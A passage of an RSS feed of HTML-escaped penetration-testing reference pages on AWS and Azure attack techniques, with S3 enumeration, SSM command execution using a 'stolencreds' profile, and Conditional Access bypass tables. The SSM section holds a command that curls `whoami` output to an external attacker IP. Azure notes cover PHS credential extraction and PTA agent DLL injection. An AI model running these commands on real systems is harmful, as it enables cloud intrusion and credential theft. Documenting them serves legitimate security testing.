&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;bucket_finder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;rb&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-log&lt;/span&gt;&lt;span class="o"&gt;-file&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;out&lt;/span&gt; &lt;span class="n"&gt;my_words&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://boto3.amazonaws.com/v1/documentation/api/latest/index.html"&gt;aws-sdk/boto3&lt;/a&gt; - Amazon Web Services (AWS) SDK for Python&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;boto3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;s3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;s3&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;aws_access_key_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;AKIAJQDP3RKREDACTED&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;aws_secret_access_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;region_name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;us-west-1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s3&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="ne"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/nccgroup/s3_objects_check"&gt;nccgroup/s3_objects_check&lt;/a&gt; - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files&lt;/p&gt;</description></item><item><title>AWS - Service - SSM</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-ssm/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-ssm/</guid><description>&lt;h2 id="command-execution" class="anchored-heading"&gt;Command execution&lt;a class="heading-anchor" href="#command-execution" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.&lt;/p&gt;
&lt;p&gt;SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Windows Server 2008-2012 R2 AMIs published in November 2016 or later&lt;/li&gt;
&lt;li&gt;Windows Server 2016 and 2019&lt;/li&gt;
&lt;li&gt;Amazon Linux&lt;/li&gt;
&lt;li&gt;Amazon Linux 2&lt;/li&gt;
&lt;li&gt;Ubuntu Server 16.04&lt;/li&gt;
&lt;li&gt;Ubuntu Server 18.04&lt;/li&gt;
&lt;li&gt;Amazon ECS-Optimized&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ssm&lt;/span&gt; &lt;span class="nb"&gt;describe-instance&lt;/span&gt;&lt;span class="n"&gt;-information&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="n"&gt;stolencreds&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ssm&lt;/span&gt; &lt;span class="nb"&gt;send-command&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-ids&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;INSTANCE-ID-HERE&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-document-name&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;AWS-RunShellScript&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-comment&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;IP Config&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-parameters&lt;/span&gt; &lt;span class="n"&gt;commands&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ifconfig&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-output&lt;/span&gt; &lt;span class="n"&gt;text&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-query&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Command.CommandId&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="n"&gt;stolencreds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ssm&lt;/span&gt; &lt;span class="nb"&gt;list-command&lt;/span&gt;&lt;span class="n"&gt;-invocations&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-command-id&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;COMMAND-ID-HERE&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-details&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-query&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="n"&gt;stolencreds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;g:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ssm&lt;/span&gt; &lt;span class="nb"&gt;send-command&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-ids&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;i-05b████████adaa&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-document-name&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;AWS-RunShellScript&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-comment&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;whoami&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-parameters&lt;/span&gt; &lt;span class="n"&gt;commands&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;curl 162.243.███.███:8080/`whoami`&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-output&lt;/span&gt; &lt;span class="n"&gt;text&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;us-east&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html"&gt;What is AWS Systems Manager? - AWS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>AWS - Training</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-training/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-training/</guid><description>&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloudfoxable.bishopfox.com/"&gt;bishopfox/CloudFoxable&lt;/a&gt;: A Gamified Cloud Hacking Sandbox&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/ine-labs/AWSGoat"&gt;ine-labs/AWSGoat&lt;/a&gt; : A Damn Vulnerable AWS Infrastructure&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/m6a-UdS/dvca"&gt;m6a-UdS/dvca&lt;/a&gt; - A demonstration project to show how to do privilege escalation on AWS&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/nccgroup/sadcloud"&gt;nccgroup/sadcloud&lt;/a&gt; - A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure&lt;/li&gt;
&lt;li&gt;&lt;a href="http://flaws.cloud"&gt;0xdabbad00/Flaws&lt;/a&gt; - Several level of challenges around AWS&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/RhinoSecurityLabs/cloudgoat"&gt;RhinoSecurityLabs/cloudgoat&lt;/a&gt; - &amp;ldquo;Vulnerable by Design&amp;rdquo; AWS deployment tool&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Azure - Requirements</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-requirements/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-requirements/</guid><description>&lt;h2 id="pentest-requirements" class="anchored-heading"&gt;Pentest Requirements&lt;a class="heading-anchor" href="#pentest-requirements" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Users and roles:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Global Reader&lt;/strong&gt; and &lt;strong&gt;Security Reader&lt;/strong&gt; roles in Azure AD&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reader&lt;/strong&gt; permission over the subscription&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Subscriptions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://azure.microsoft.com/en-us/pricing/offers/dev-test"&gt;Azure Dev/Test&lt;/a&gt; subscription.&lt;/li&gt;
&lt;li&gt;Visual Studio subscription determines the monthly Azure credits you receive
&lt;ul&gt;
&lt;li&gt;Visual Studio Enterprise: $150/month&lt;/li&gt;
&lt;li&gt;MSDN Platforms: $100&lt;/li&gt;
&lt;li&gt;Visual Studio Professional: $50&lt;/li&gt;
&lt;li&gt;Visual Studio Test Professional: $50&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="powershell-and-native-modules" class="anchored-heading"&gt;Powershell and Native Modules&lt;a class="heading-anchor" href="#powershell-and-native-modules" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation?view=graph-powershell-1.0"&gt;Microsoft Graph&lt;/a&gt;: &lt;code&gt;Install-Module Microsoft.Graph -Scope CurrentUser&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/fr-fr/powershell/azure/active-directory/install-adv2?view=azureadps-2.0"&gt;Azure AD&lt;/a&gt;: &lt;code&gt;Install-Module AzureAD&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/fr-fr/powershell/azure/active-directory/install-adv2?view=azureadps-2.0"&gt;Azure AD Preview&lt;/a&gt;: &lt;code&gt;Install-Module AzureADPreview&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/fr-fr/cli/azure/install-azure-cli-windows?tabs=winget"&gt;Azure CLI&lt;/a&gt;: &lt;code&gt;winget install -e --id Microsoft.AzureCLI&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="terminology" class="anchored-heading"&gt;Terminology&lt;a class="heading-anchor" href="#terminology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Tenant&lt;/strong&gt;: An instance of Azure AD and represents a single organization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Azure AD Directory&lt;/strong&gt;: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Subscriptions&lt;/strong&gt;: It is used to pay for services. There can be multiple subscriptions in a Directory.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Core Domain&lt;/strong&gt;: The initial domain name &lt;code&gt;&amp;lt;tenant&amp;gt;.onmicrosoft.com&lt;/code&gt; is the core domain. It is possible to define custom domain names too.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest"&gt;Az - Permissions for a Pentest - HackTricks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://akimbocore.com/article/introduction-to-pentesting-azure/"&gt;An introduction to penetration testing Azure - HollyGraceful - 06 August 2021&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.alteredsecurity.com/azureadlab"&gt;Training - Attacking and Defending Azure Lab - Altered Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Azure AD - Access and Tokens</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-access-and-token/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-access-and-token/</guid><description>&lt;h2 id="connection" class="anchored-heading"&gt;Connection&lt;a class="heading-anchor" href="#connection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;When you authenticate to the Microsoft Graph API in PowerShell/CLI, you will be using an application from a Microsoft&amp;rsquo;s tenant.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in"&gt;Microsoft Applications ID&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://entrascopes.com/"&gt;Entra ID First Party Apps &amp;amp; Scope Browser&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Name&lt;/th&gt;
 &lt;th&gt;Application ID&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Microsoft Azure PowerShell&lt;/td&gt;
 &lt;td&gt;1950a258-227b-4e31-a9cf-717495945fc2&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Microsoft Azure CLI&lt;/td&gt;
 &lt;td&gt;04b07795-8ddb-461a-bbee-02f9e1bf7b46&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Portail Azure&lt;/td&gt;
 &lt;td&gt;c44b4083-3bb0-49c1-b47d-974e53cbdf3c&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;After a successfull authentication, you will get an access token.&lt;/p&gt;
&lt;h3 id="az-cli" class="anchored-heading"&gt;az cli&lt;a class="heading-anchor" href="#az-cli" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Login with credentials&lt;/p&gt;</description></item><item><title>Azure AD - AD Connect and Cloud Sync</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-ad-connect/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-ad-connect/</guid><description>&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Active Directory&lt;/th&gt;
 &lt;th&gt;Azure AD&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;LDAP&lt;/td&gt;
 &lt;td&gt;REST API&amp;rsquo;S&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;NTLM/Kerberos&lt;/td&gt;
 &lt;td&gt;OAuth/SAML/OpenID&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Structured directory (OU tree)&lt;/td&gt;
 &lt;td&gt;Flat structure&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;GPO&lt;/td&gt;
 &lt;td&gt;No GPO&amp;rsquo;s&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Super fine-tuned access controls&lt;/td&gt;
 &lt;td&gt;Predefined roles&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Domain/forest&lt;/td&gt;
 &lt;td&gt;Tenant&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Trusts&lt;/td&gt;
 &lt;td&gt;Guests&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Check if Azure AD Connect is installed : &lt;code&gt;Get-ADSyncConnector&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For &lt;strong&gt;PHS&lt;/strong&gt;, we can extract the credentials
&lt;ul&gt;
&lt;li&gt;Passwords from on-premise AD are sent to the cloud&lt;/li&gt;
&lt;li&gt;Use replication via a service account created by AD Connect&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;For &lt;strong&gt;PTA&lt;/strong&gt;, we can attack the agent
&lt;ul&gt;
&lt;li&gt;Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;For &lt;strong&gt;Federation&lt;/strong&gt;, connect Windows Server AD to Azure AD using Federation Server (ADFS)
&lt;ul&gt;
&lt;li&gt;Dir-Sync : Handled by on-premise Windows Server AD, sync username/password&lt;/li&gt;
&lt;li&gt;extract the certificate from ADFS server using DA&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="password-hash-synchronization" class="anchored-heading"&gt;Password Hash Synchronization&lt;a class="heading-anchor" href="#password-hash-synchronization" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Get token for &lt;code&gt;SYNC_*&lt;/code&gt; account and reset on-prem admin password&lt;/p&gt;</description></item><item><title>Azure AD - Conditional Access Policy</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-ad-conditional-access-policy/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-ad-conditional-access-policy/</guid><description>&lt;p&gt;Conditional Access is used to restrict access to resources to compliant devices only.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/rbnroot/CAPSlock"&gt;rbnroot/CAPSlock&lt;/a&gt; - Offline Conditional Access (CA) analysis tool built on top of a roadrecon database.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/absolomb/FindMeAccess"&gt;absolomb/FindMeAccess&lt;/a&gt; - Tool for finding gaps in Azure/M365 MFA requirements for different resources, client ids, and user agents.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="enumerate-conditional-access-policies" class="anchored-heading"&gt;Enumerate Conditional Access Policies&lt;a class="heading-anchor" href="#enumerate-conditional-access-policies" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Enumerate Conditional Access Policies: &lt;code&gt;roadrecon plugin policies&lt;/code&gt; (query the local database)&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;CAP&lt;/th&gt;
 &lt;th&gt;Bypass&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Location / IP ranges&lt;/td&gt;
 &lt;td&gt;Corporate VPN, Guest Wifi&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Platform requirement&lt;/td&gt;
 &lt;td&gt;User-Agent switcher (Android, PS4, Linux, &amp;hellip;)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Protocol requirement&lt;/td&gt;
 &lt;td&gt;Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Azure AD Joined Device&lt;/td&gt;
 &lt;td&gt;Try to join a VM (Work Access)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Compliant Device (Intune)&lt;/td&gt;
 &lt;td&gt;Fake device compliance&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Device requirement&lt;/td&gt;
 &lt;td&gt;/&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;MFA&lt;/td&gt;
 &lt;td&gt;/&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Legacy Protocols&lt;/td&gt;
 &lt;td&gt;/&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Domain Joined&lt;/td&gt;
 &lt;td&gt;/&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;CAPSlock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;analyze&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;userprincipalname&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-resource&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;resource-id&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;options&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;CAPSlock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="nb"&gt;what-if&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;userprincipalname&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-resource&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;resource-id&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;options&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;CAPSlock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="nb"&gt;web-gui&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-port&lt;/span&gt; &lt;span class="mf"&gt;8080&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="bypassing-cap-by-faking-device-compliance" class="anchored-heading"&gt;Bypassing CAP by faking device compliance&lt;a class="heading-anchor" href="#bypassing-cap-by-faking-device-compliance" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="intune-company-portal-client-id-bypass" class="anchored-heading"&gt;Intune Company Portal Client ID Bypass&lt;a class="heading-anchor" href="#intune-company-portal-client-id-bypass" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
